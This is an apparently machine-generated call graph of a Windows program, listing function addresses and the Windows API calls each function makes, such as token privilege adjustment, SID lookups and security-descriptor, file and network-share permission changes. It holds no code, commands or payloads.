7ff69706741f 42558->42561 42559->42550 42562 7ff697067451 42560->42562 42563 7ff697067452 42562->42563 42564 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42563->42564 42565 7ff697067457 42564->42565 42566 7ff69706716f 42569 7ff697067189 MakeAbsoluteSD 42566->42569 42591 7ff69704be10 35 API calls 5 library calls 42566->42591 42567->42566 42590 7ff69704be10 35 API calls 5 library calls 42567->42590 42571 7ff6970671e6 IsValidSid 42569->42571 42572 7ff69706720f 42569->42572 42571->42572 42574 7ff6970671f3 __std_exception_destroy 42571->42574 42575 7ff697067218 IsValidSid 42572->42575 42576 7ff697067241 42572->42576 42573 7ff697067185 42573->42569 42592 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42574->42592 42575->42576 42577 7ff697067225 __std_exception_destroy 42575->42577 42578 7ff697067257 __std_exception_destroy 42576->42578 42579 7ff69706724f LocalFree 42576->42579 42593 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42577->42593 42582 7ff69706726b IsValidSecurityDescriptor 42578->42582 42583 7ff697067347 GetLastError 42578->42583 42579->42578 42582->42583 42584 7ff69706727d ISource 42582->42584 42583->42584 42584->42563 42584->42585 42586 7ff69706743a 42584->42586 42585->42557 42585->42587 42588 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42586->42588 42587->42558 42588->42557 42589->42551 42590->42566 42591->42573 42592->42572 42593->42576 42594 7ff697053d1b AdjustTokenPrivileges 42595 7ff697053d4d GetLastError 42594->42595 42596 7ff697053d66 GetLastError CloseHandle 42594->42596 42595->42596 42597 7ff697053d57 CloseHandle 42595->42597 42598 7ff697053d7a ISource 42596->42598 42597->42598 42599 7ff69705440c 42598->42599 42600 7ff697054412 42598->42600 42601 7ff697043f80 35 API calls 42598->42601 42614 7ff697053e78 ISource 42598->42614 42603 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42599->42603 42606 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42600->42606 42604 7ff697053e48 42601->42604 42602 7ff697043f80 35 API calls 42605 7ff697053f4a 42602->42605 42603->42600 42607 7ff697043f80 35 API calls 42604->42607 42608 7ff697043f80 35 API calls 42605->42608 42609 7ff697054418 42606->42609 42607->42614 42610 7ff697053f77 GetCurrentProcess OpenProcessToken 42608->42610 42612 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42609->42612 42611 7ff697053f9a GetLastError 42610->42611 42617 7ff697054037 ISource 42611->42617 42613 7ff69705441e 42612->42613 42615 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42613->42615 42614->42602 42614->42609 42618 7ff6970543dd 42614->42618 42616 7ff697054424 42615->42616 42621 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42616->42621 42617->42613 42617->42616 42619 7ff697043f80 35 API calls 42617->42619 42627 7ff6970541d3 ISource 42617->42627 42620 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42618->42620 42622 7ff697054105 42619->42622 42624 7ff6970543e2 42620->42624 42625 7ff69705442a 42621->42625 42626 7ff697043f80 35 API calls 42622->42626 42623 7ff697054314 42628 7ff697054331 42623->42628 42655 7ff69706e4b0 42623->42655 42632 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42624->42632 42633 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42625->42633 42641 7ff697054135 ISource 42626->42641 42629 7ff69706e4b0 92 API calls 42627->42629 42631 7ff697054268 42627->42631 42639 7ff697054356 42627->42639 42634 7ff69706e4b0 92 API calls 42628->42634 42638 7ff697054352 42628->42638 42628->42639 42629->42627 42631->42623 42635 7ff69706e4b0 92 API calls 42631->42635 42631->42639 42636 7ff6970543e8 42632->42636 42637 7ff697054430 42633->42637 42634->42638 42635->42631 42640 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42636->42640 42638->42639 42643 7ff69705a350 259 API calls 42638->42643 42642 7ff697072180 _handle_errorf 8 API calls 42639->42642 42644 7ff6970543ee 42640->42644 42641->42618 42641->42625 42641->42627 42645 7ff6970543c0 42642->42645 42643->42639 42646 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42644->42646 42647 7ff6970543f4 42646->42647 42648 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42647->42648 42649 7ff6970543fa 42648->42649 42650 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42649->42650 42651 7ff697054400 42650->42651 42652 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42651->42652 42653 7ff697054406 42652->42653 42654 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42653->42654 42654->42599 42657 7ff69706e4f6 __std_exception_destroy 42655->42657 42656 7ff69706e50c ConvertStringSidToSidW 42658 7ff69706e51b 42656->42658 42667 7ff69706e53b 42656->42667 42657->42656 42782 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42658->42782 42660 7ff69706e525 LocalFree 42670 7ff69706ebc1 ISource 42660->42670 42662 7ff697072180 _handle_errorf 8 API calls 42664 7ff69706ebd4 42662->42664 42664->42628 42665 7ff697043f80 35 API calls 42666 7ff69706e74b 42665->42666 42748 7ff697044750 42666->42748 42669 7ff697043f80 35 API calls 42667->42669 42689 7ff69706e6a7 ISource 42667->42689 42706 7ff69706e5d7 ISource 42667->42706 42676 7ff69706e610 ISource 42669->42676 42670->42662 42671 7ff69706ec18 42674 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42671->42674 42672 7ff69706e759 ISource 42673 7ff697070c18 13 API calls 42672->42673 42678 7ff69706ebfa 42672->42678 42688 7ff69706e7e9 42672->42688 42679 7ff69706e7b9 42673->42679 42683 7ff69706ec1e 42674->42683 42675 7ff69706ebf4 42682 7ff697039910 33 API calls 42675->42682 42676->42675 42681 7ff69706ec12 42676->42681 42687 7ff697043f80 35 API calls 42676->42687 42677 7ff69706ebef 42680 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42677->42680 42684 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42678->42684 42783 7ff697045cf0 70 API calls 42679->42783 42680->42675 42685 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42681->42685 42682->42678 42686 7ff69706ec00 42684->42686 42685->42671 42692 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42686->42692 42687->42689 42690 7ff697039520 35 API calls 42688->42690 42710 7ff69706e981 ISource 42688->42710 42689->42681 42719 7ff69706f9c0 42689->42719 42693 7ff69706e839 42690->42693 42695 7ff69706ec06 42692->42695 42696 7ff697039520 35 API calls 42693->42696 42698 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42695->42698 42699 7ff69706e847 DsGetDcNameW 42696->42699 42697 7ff69706e9ef 42702 7ff69706ea1d 42697->42702 42703 7ff69706ea02 42697->42703 42697->42706 42700 7ff69706ec0c 42698->42700 42704 7ff69706e89e 42699->42704 42712 7ff69706e912 ISource 42699->42712 42707 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42700->42707 42702->42706 42708 7ff697043f80 35 API calls 42702->42708 42705 7ff69706f3c0 46 API calls 42703->42705 42714 7ff697043f80 35 API calls 42704->42714 42705->42706 42706->42670 42706->42671 42706->42677 42706->42681 42706->42695 42706->42700 42707->42681 42709 7ff69706ea4c 42708->42709 42711 7ff69706f3c0 46 API calls 42709->42711 42710->42700 42755 7ff69706f3c0 42710->42755 42711->42706 42712->42686 42712->42710 42713 7ff697043f80 35 API calls 42712->42713 42713->42710 42715 7ff69706e8bc 42714->42715 42784 7ff69704eaf0 8 API calls 3 library calls 42715->42784 42717 7ff69706e901 42717->42712 42718 7ff69706e90b NetApiBufferFree 42717->42718 42718->42712 42720 7ff697070c18 13 API calls 42719->42720 42721 7ff69706f9e9 42720->42721 42723 7ff69703c870 70 API calls 42721->42723 42724 7ff69706faa2 42721->42724 42722 7ff697070c18 13 API calls 42726 7ff69706fb3b 42722->42726 42723->42721 42724->42722 42747 7ff69706e706 42724->42747 42725 7ff69703c870 70 API calls 42725->42726 42726->42725 42728 7ff69706fbf0 42726->42728 42727 7ff697070c18 13 API calls 42729 7ff69706fc89 42727->42729 42728->42727 42728->42747 42731 7ff69703c870 70 API calls 42729->42731 42732 7ff69706fd40 42729->42732 42730 7ff697070c18 13 API calls 42733 7ff69706fdd9 42730->42733 42731->42729 42732->42730 42732->42747 42735 7ff69703c870 70 API calls 42733->42735 42736 7ff69706fe90 42733->42736 42734 7ff697070c18 13 API calls 42737 7ff69706ff29 42734->42737 42735->42733 42736->42734 42736->42747 42739 7ff69703c870 70 API calls 42737->42739 42740 7ff69706ffe0 42737->42740 42738 7ff697070c18 13 API calls 42741 7ff697070079 42738->42741 42739->42737 42740->42738 42740->42747 42743 7ff69703c870 70 API calls 42741->42743 42744 7ff697070130 42741->42744 42742 7ff697070c18 13 API calls 42746 7ff6970701c9 42742->42746 42743->42741 42744->42742 42744->42747 42745 7ff69703c870 70 API calls 42745->42746 42746->42745 42746->42747 42747->42665 42749 7ff697043f80 35 API calls 42748->42749 42750 7ff697044791 42749->42750 42785 7ff69707e3a4 42750->42785 42752 7ff6970447e3 __std_exception_destroy 42752->42672 42754 7ff697043f80 35 API calls 42754->42752 42757 7ff69706f3ea LookupAccountNameW GetLastError 42755->42757 42758 7ff69706f469 42757->42758 42759 7ff69706f45e GetLastError 42757->42759 42761 7ff69706f4bb 42758->42761 42762 7ff69706f492 42758->42762 42766 7ff69706f4a4 memcpy_s 42758->42766 42777 7ff69706f61f ISource 42759->42777 42764 7ff6970721d4 std::_Facet_Register 5 API calls 42761->42764 42763 7ff69706f653 Concurrency::cancel_current_task 42762->42763 42765 7ff6970721d4 std::_Facet_Register 5 API calls 42762->42765 42764->42766 42765->42766 42773 7ff69706f5f0 ISource 42766->42773 42810 7ff697045790 35 API calls 3 library calls 42766->42810 42768 7ff69706f4f7 LookupAccountNameW 42769 7ff69706f557 GetLastError 42768->42769 42770 7ff69706f561 42768->42770 42775 7ff69706f5b7 42769->42775 42774 7ff697043f80 35 API calls 42770->42774 42771 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42772 7ff69706f652 42771->42772 42772->42763 42773->42771 42773->42777 42776 7ff69706f586 42774->42776 42775->42773 42778 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42775->42778 42776->42775 42779 7ff69706f590 IsValidSid 42776->42779 42777->42697 42778->42773 42779->42775 42780 7ff69706f59d __std_exception_destroy 42779->42780 42811 7ff69706ec20 IsValidSid GetLengthSid CopySid __std_exception_destroy 42780->42811 42782->42660 42783->42688 42784->42717 42788 7ff69707e218 42785->42788 42809 7ff69707f264 EnterCriticalSection 42788->42809 42790 7ff69707e244 42791 7ff69707e24c 42790->42791 42794 7ff69707e26f 42790->42794 42792 7ff69707e1f8 _get_daylight 14 API calls 42791->42792 42793 7ff69707e251 42792->42793 42795 7ff6970788dc _invalid_parameter_noinfo 31 API calls 42793->42795 42796 7ff69707e30c 39 API calls 42794->42796 42806 7ff69707e25d 42795->42806 42799 7ff69707e277 42796->42799 42797 7ff69707f2b8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 42798 7ff6970447b7 42797->42798 42798->42752 42798->42754 42800 7ff69707e2b4 42799->42800 42801 7ff69707e2a4 42799->42801 42799->42806 42803 7ff697085174 _Getctype 31 API calls 42800->42803 42802 7ff69707e1f8 _get_daylight 14 API calls 42801->42802 42802->42806 42804 7ff69707e2c2 42803->42804 42805 7ff69707e2f5 42804->42805 42804->42806 42807 7ff69707892c _invalid_parameter_noinfo_noreturn 17 API calls 42805->42807 42806->42797 42808 7ff69707e309 42807->42808 42810->42768 42811->42775 42812 7ff697053fd8 AdjustTokenPrivileges 42813 7ff69705400a GetLastError 42812->42813 42814 7ff697054023 GetLastError CloseHandle 42812->42814 42813->42814 42815 7ff697054014 CloseHandle 42813->42815 42816 7ff697054037 ISource 42814->42816 42815->42816 42817 7ff697054424 42816->42817 42819 7ff697043f80 35 API calls 42816->42819 42822 7ff6970541d3 ISource 42816->42822 42862 7ff69705441e 42816->42862 42820 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42817->42820 42818 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42818->42817 42821 7ff697054105 42819->42821 42824 7ff69705442a 42820->42824 42825 7ff697043f80 35 API calls 42821->42825 42827 7ff69706e4b0 92 API calls 42822->42827 42829 7ff697054268 42822->42829 42840 7ff697054356 42822->42840 42823 7ff697054314 42826 7ff697054331 42823->42826 42828 7ff69706e4b0 92 API calls 42823->42828 42830 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42824->42830 42835 7ff697054135 ISource 42825->42835 42831 7ff69706e4b0 92 API calls 42826->42831 42834 7ff697054352 42826->42834 42826->42840 42827->42822 42828->42826 42829->42823 42832 7ff69706e4b0 92 API calls 42829->42832 42829->42840 42833 7ff697054430 42830->42833 42831->42834 42832->42829 42837 7ff69705a350 259 API calls 42834->42837 42834->42840 42835->42822 42835->42824 42839 7ff6970543dd 42835->42839 42836 7ff697072180 _handle_errorf 8 API calls 42838 7ff6970543c0 42836->42838 42837->42840 42841 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42839->42841 42840->42836 42842 7ff6970543e2 42841->42842 42843 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42842->42843 42844 7ff6970543e8 42843->42844 42845 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42844->42845 42846 7ff6970543ee 42845->42846 42847 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42846->42847 42848 7ff6970543f4 42847->42848 42849 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42848->42849 42850 7ff6970543fa 42849->42850 42851 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42850->42851 42852 7ff697054400 42851->42852 42853 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42852->42853 42854 7ff697054406 42853->42854 42855 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42854->42855 42856 7ff69705440c 42855->42856 42857 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42856->42857 42858 7ff697054412 42857->42858 42859 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42858->42859 42860 7ff697054418 42859->42860 42861 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42860->42861 42861->42862 42862->42818 42863 7ff697082ff4 42864 7ff69708305b 42863->42864 42865 7ff697083011 GetModuleHandleW 42863->42865 42873 7ff697082eec 42864->42873 42865->42864 42871 7ff69708301e 42865->42871 42868 7ff69708309d 42870 7ff6970830af 42871->42864 42887 7ff6970830fc GetModuleHandleExW 42871->42887 42893 7ff69707f264 EnterCriticalSection 42873->42893 42875 7ff697082f08 42876 7ff697082f24 39 API calls 42875->42876 42877 7ff697082f11 42876->42877 42878 7ff69707f2b8 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 42877->42878 42879 7ff697082f19 42878->42879 42879->42868 42880 7ff6970830b0 42879->42880 42894 7ff69708aa24 42880->42894 42883 7ff6970830ea 42885 7ff6970830fc 3 API calls 42883->42885 42884 7ff6970830d9 GetCurrentProcess TerminateProcess 42884->42883 42886 7ff6970830f1 ExitProcess 42885->42886 42888 7ff697083122 GetProcAddress 42887->42888 42889 7ff697083141 42887->42889 42888->42889 42892 7ff697083139 42888->42892 42890 7ff69708314b FreeLibrary 42889->42890 42891 7ff697083151 42889->42891 42890->42891 42891->42864 42892->42889 42895 7ff69708aa42 42894->42895 42896 7ff6970830bd 42894->42896 42898 7ff697087b70 5 API calls try_get_function 42895->42898 42896->42883 42896->42884 42898->42896 42899 7ff697067715 42900 7ff69706771f 42899->42900 42901 7ff697067ef0 42899->42901 42902 7ff69706772c 42900->42902 42903 7ff6970679d1 42900->42903 43001 7ff697066970 31 API calls 3 library calls 42901->43001 42905 7ff697043f80 35 API calls 42902->42905 42906 7ff697067a48 42903->42906 42908 7ff697067bb6 42903->42908 42909 7ff6970679e3 42903->42909 42907 7ff697067759 42905->42907 42920 7ff697039520 35 API calls 42906->42920 42990 7ff697067a86 __std_exception_destroy 42906->42990 42911 7ff697043f80 35 API calls 42907->42911 42908->42906 42919 7ff69705a350 259 API calls 42908->42919 42912 7ff6970679ed 42909->42912 42913 7ff6970679f0 CreateFileW 42909->42913 42910 7ff697067f82 ISource 42916 7ff69706765d ISource 42910->42916 42933 7ff697067fe1 42910->42933 42915 7ff697067790 42911->42915 42912->42913 42917 7ff697067a29 42913->42917 42918 7ff697067a35 GetLastError 42913->42918 42914 7ff697067ef9 ISource 42914->42910 42927 7ff697067fdc 42914->42927 42977 7ff697068005 42914->42977 42991 7ff6970442a0 58 API calls 3 library calls 42915->42991 42925 7ff6970676aa ISource __std_exception_destroy 42916->42925 42940 7ff697067fe7 42916->42940 42928 7ff697067c03 SetSecurityInfo 42917->42928 42918->42906 42924 7ff697067bdc 42919->42924 42921 7ff697067a66 42920->42921 42993 7ff6970450c0 73 API calls 3 library calls 42921->42993 42923 7ff697067af9 42931 7ff697067b3d 42923->42931 42952 7ff697067b33 42923->42952 42995 7ff697069fb0 16 API calls _handle_errorf 42923->42995 42924->42906 42924->42928 42956 7ff697072180 _handle_errorf 8 API calls 42925->42956 42926 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42932 7ff69706800b 42926->42932 42934 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42927->42934 42928->42906 42928->42931 42930 7ff6970677a4 ISource 42947 7ff697067fed 42930->42947 42950 7ff6970679cd 42930->42950 42951 7ff697067857 42930->42951 42964 7ff697067ff3 42930->42964 42945 7ff697067b58 42931->42945 42946 7ff697067b4f CloseHandle 42931->42946 42941 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42933->42941 42934->42933 42935 7ff697067a75 42948 7ff697039520 35 API calls 42935->42948 42935->42990 42937 7ff697067cd9 42961 7ff697043f80 35 API calls 42937->42961 42978 7ff697067d00 ISource 42937->42978 42938 7ff697067d05 42943 7ff697067d2b 42938->42943 42974 7ff697067ff9 42938->42974 42942 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42940->42942 42941->42940 42942->42947 42963 7ff697043f80 35 API calls 42943->42963 42954 7ff697067b6d 42945->42954 42955 7ff697067b62 RegCloseKey 42945->42955 42946->42945 42958 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42947->42958 42948->42990 42949 7ff697039910 33 API calls 42962 7ff697067fff 42949->42962 42950->42903 42992 7ff697066970 31 API calls 3 library calls 42951->42992 42952->42931 42952->42937 42952->42938 42972 7ff697067e16 SetNamedSecurityInfoW 42952->42972 42953 7ff697067dcb NetShareGetInfo 42966 7ff697067e06 42953->42966 42967 7ff697067de2 42953->42967 42996 7ff697066970 31 API calls 3 library calls 42954->42996 42955->42954 42957 7ff6970676f8 42956->42957 42958->42964 42959 7ff697067ec8 NetShareSetInfo 42959->42931 42960 7ff697067e78 42960->42931 42960->42959 42961->42978 42975 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42962->42975 42970 7ff697067d52 42963->42970 42969 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 42964->42969 42966->42972 42973 7ff697067e10 NetApiBufferFree 42966->42973 42980 7ff697043f80 35 API calls 42967->42980 42969->42974 42970->42962 42970->42978 42971 7ff697067b76 42997 7ff697044230 31 API calls 2 library calls 42971->42997 42972->42931 42972->42960 42973->42972 42974->42949 42975->42977 42977->42926 42978->42953 42979 7ff6970678ee ISource 42979->42933 42983 7ff69706793e ISource 42979->42983 42980->42966 42981 7ff697067b80 42998 7ff697044230 31 API calls 2 library calls 42981->42998 42983->42940 42989 7ff69706798a ISource __std_exception_destroy 42983->42989 42984 7ff697067860 ISource 42984->42927 42984->42977 42984->42979 42985 7ff697067b8a 42999 7ff697044230 31 API calls 2 library calls 42985->42999 42987 7ff697067b94 43000 7ff697044230 31 API calls 2 library calls 42987->43000 42989->42925 42990->42923 42990->42952 42994 7ff697069fb0 16 API calls _handle_errorf 42990->42994 42991->42930 42992->42984 42993->42935 42994->42923 42995->42952 42996->42971 42997->42981 42998->42985 42999->42987 43000->42925 43001->42914 43002 7ff69704d304 43003 7ff69704d65f LeaveCriticalSection 43002->43003 43004 7ff69704d310 43002->43004 43010 7ff69704d659 43003->43010 43004->43003 43005 7ff69704d326 43004->43005 43006 7ff69704d35b 43005->43006 43007 7ff69704d330 GetSystemTimeAsFileTime 43005->43007 43008 7ff69704d36f 43006->43008 43009 7ff69704d35f GetCurrentThreadId 43006->43009 43007->43006 43011 7ff69704d527 LeaveCriticalSection 43008->43011 43012 7ff69704d377 GetUserNameExW 43008->43012 43009->43008 43013 7ff69704d6a0 ISource 43010->43013 43047 7ff69704d74d 43010->43047 43018 7ff6970721d4 std::_Facet_Register 5 API calls 43011->43018 43015 7ff69704d3a6 GetLastError 43012->43015 43016 7ff69704d3b9 43012->43016 43019 7ff69704d753 43013->43019 43020 7ff69704d6d9 ISource 43013->43020 43014 7ff697072180 _handle_errorf 8 API calls 43021 7ff69704d727 43014->43021 43015->43016 43034 7ff69704d452 ISource 43015->43034 43052 7ff697045790 35 API calls 3 library calls 43016->43052 43017 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43017->43019 43023 7ff69704d53a 43018->43023 43024 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43019->43024 43020->43014 43026 7ff69704d5cc 43023->43026 43031 7ff697043f80 35 API calls 43023->43031 43027 7ff69704d759 43024->43027 43025 7ff69704d3c9 GetUserNameExW 43029 7ff69704d3e6 GetLastError 43025->43029 43030 7ff69704d3f0 43025->43030 43028 7ff69704d605 43026->43028 43032 7ff697043f80 35 API calls 43026->43032 43033 7ff69704d627 43028->43033 43036 7ff697043f80 35 API calls 43028->43036 43035 7ff69704d417 43029->43035 43039 7ff697043f80 35 API calls 43030->43039 43031->43026 43032->43028 43037 7ff69704d649 43033->43037 43043 7ff697043f80 35 API calls 43033->43043 43034->43011 43053 7ff69703a740 36 API calls 3 library calls 43034->43053 43035->43034 43041 7ff69704d748 43035->43041 43036->43033 43055 7ff69704ea60 9 API calls std::_Facet_Register 43037->43055 43039->43035 43044 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43041->43044 43042 7ff69704d51b 43054 7ff697039720 31 API calls 2 library calls 43042->43054 43043->43037 43044->43047 43046 7ff69704d4ee 43046->43042 43051 7ff697043f80 35 API calls 43046->43051 43047->43017 43048 7ff69704d526 43048->43011 43049 7ff69704d4b5 43049->43042 43049->43046 43050 7ff697043f80 35 API calls 43049->43050 43050->43046 43051->43042 43052->43025 43053->43049 43054->43048 43055->43010 43056 7ff697053a5e AdjustTokenPrivileges 43057 7ff697053aa9 GetLastError CloseHandle 43056->43057 43058 7ff697053a90 GetLastError 43056->43058 43060 7ff697053abd ISource 43057->43060 43058->43057 43059 7ff697053a9a CloseHandle 43058->43059 43059->43060 43061 7ff697043f80 35 API calls 43060->43061 43063 7ff697054400 43060->43063 43078 7ff697053bbb ISource 43060->43078 43120 7ff6970543fa 43060->43120 43066 7ff697053b8b 43061->43066 43062 7ff697043f80 35 API calls 43067 7ff697053c8d 43062->43067 43065 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43063->43065 43064 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43064->43063 43068 7ff697054406 43065->43068 43069 7ff697043f80 35 API calls 43066->43069 43070 7ff697043f80 35 API calls 43067->43070 43072 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43068->43072 43069->43078 43071 7ff697053cba GetCurrentProcess OpenProcessToken 43070->43071 43073 7ff697053cdd GetLastError 43071->43073 43074 7ff69705440c 43072->43074 43076 7ff697053d7a ISource 43073->43076 43075 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43074->43075 43077 7ff697054412 43075->43077 43076->43074 43076->43077 43080 7ff697043f80 35 API calls 43076->43080 43096 7ff697053e78 ISource 43076->43096 43085 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43077->43085 43078->43062 43078->43068 43079 7ff6970543dd 43078->43079 43082 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43079->43082 43083 7ff697053e48 43080->43083 43081 7ff697043f80 35 API calls 43084 7ff697053f4a 43081->43084 43086 7ff6970543e2 43082->43086 43087 7ff697043f80 35 API calls 43083->43087 43088 7ff697043f80 35 API calls 43084->43088 43089 7ff697054418 43085->43089 43091 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43086->43091 43087->43096 43090 7ff697053f77 GetCurrentProcess OpenProcessToken 43088->43090 43093 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43089->43093 43092 7ff697053f9a GetLastError 43090->43092 43094 7ff6970543e8 43091->43094 43100 7ff697054037 ISource 43092->43100 43095 7ff69705441e 43093->43095 43098 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43094->43098 43097 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43095->43097 43096->43079 43096->43081 43096->43089 43099 7ff697054424 43097->43099 43101 7ff6970543ee 43098->43101 43103 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43099->43103 43100->43095 43100->43099 43102 7ff697043f80 35 API calls 43100->43102 43109 7ff6970541d3 ISource 43100->43109 43105 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43101->43105 43104 7ff697054105 43102->43104 43107 7ff69705442a 43103->43107 43108 7ff697043f80 35 API calls 43104->43108 43111 7ff6970543f4 43105->43111 43106 7ff697054314 43110 7ff697054331 43106->43110 43113 7ff69706e4b0 92 API calls 43106->43113 43115 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43107->43115 43123 7ff697054135 ISource 43108->43123 43112 7ff69706e4b0 92 API calls 43109->43112 43114 7ff697054268 43109->43114 43122 7ff697054356 43109->43122 43116 7ff69706e4b0 92 API calls 43110->43116 43121 7ff697054352 43110->43121 43110->43122 43117 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43111->43117 43112->43109 43113->43110 43114->43106 43118 7ff69706e4b0 92 API calls 43114->43118 43114->43122 43119 7ff697054430 43115->43119 43116->43121 43117->43120 43118->43114 43120->43064 43121->43122 43125 7ff69705a350 259 API calls 43121->43125 43124 7ff697072180 _handle_errorf 8 API calls 43122->43124 43123->43079 43123->43107 43123->43109 43126 7ff6970543c0 43124->43126 43125->43122 43127 7ff69707e500 43128 7ff69707e51d 43127->43128 43129 7ff69707e50e GetLastError ExitThread 43127->43129 43130 7ff697083e64 _Toupper 16 API calls 43128->43130 43131 7ff69707e522 43130->43131 43140 7ff69708a9d0 43131->43140 43134 7ff69707e53b 43144 7ff69704e8c0 43134->43144 43136 7ff69707e550 43158 7ff69707e700 43136->43158 43141 7ff69708a9e0 43140->43141 43142 7ff69707e52e 43140->43142 43141->43142 43161 7ff697087bc0 43141->43161 43142->43134 43157 7ff6970881f0 5 API calls try_get_function 43142->43157 43147 7ff69704e8d7 ISource 43144->43147 43145 7ff69704e9ee ISource 43145->43136 43146 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43148 7ff69704ea15 43146->43148 43147->43145 43147->43146 43149 7ff69704ea3c 43148->43149 43150 7ff69704ea29 43148->43150 43194 7ff697074c18 RtlPcToFileHeader RaiseException 43149->43194 43164 7ff69704d760 WaitForSingleObject 43150->43164 43154 7ff69704ea59 43155 7ff69707e700 17 API calls 43156 7ff69704ea35 43155->43156 43156->43136 43157->43134 43196 7ff69707e568 43158->43196 43162 7ff697087998 try_get_function 5 API calls 43161->43162 43163 7ff697087be8 43162->43163 43163->43142 43165 7ff69704d8a6 ReleaseMutex 43164->43165 43166 7ff69704d8d4 ISource 43164->43166 43165->43166 43167 7ff69704da41 ResetEvent 43165->43167 43173 7ff69704da02 ISource 43166->43173 43179 7ff69704e84e 43166->43179 43183 7ff69704e853 43166->43183 43188 7ff69704e865 43166->43188 43168 7ff69704da48 WaitForSingleObject 43167->43168 43168->43166 43169 7ff69704da5f 43168->43169 43170 7ff69704da77 ReleaseMutex 43169->43170 43171 7ff69704da68 ReleaseMutex 43169->43171 43177 7ff69704dab8 ISource 43170->43177 43172 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43175 7ff69704e859 43172->43175 43176 7ff697072180 _handle_errorf 8 API calls 43173->43176 43182 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43175->43182 43180 7ff69704da16 43176->43180 43177->43166 43184 7ff69704dac1 EnterCriticalSection 43177->43184 43178 7ff6970788fc 31 API calls _invalid_parameter_noinfo_noreturn 43178->43188 43181 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43179->43181 43180->43155 43181->43183 43185 7ff69704e85f 43182->43185 43183->43172 43189 7ff69704db20 CloseHandle 43184->43189 43186 7ff6970788fc _invalid_parameter_noinfo_noreturn 31 API calls 43185->43186 43186->43188 43187 7ff69704e88e 43188->43178 43188->43187 43195 7ff697043e30 33 API calls 43188->43195 43192 7ff69704e826 43189->43192 43193 7ff69704e8c0 36 API calls 43192->43193 43193->43179 43194->43154 43205 7ff697083fe0 GetLastError 43196->43205 43198 7ff69707e5c0 ExitThread 43199 7ff69707e595 43202 7ff69707e5a9 43199->43202 43203 7ff69707e5a3 CloseHandle 43199->43203 43200 7ff69707e579 43200->43198 43200->43199 43228 7ff697088230 5 API calls try_get_function 43200->43228 43202->43198 43204 7ff69707e5b7 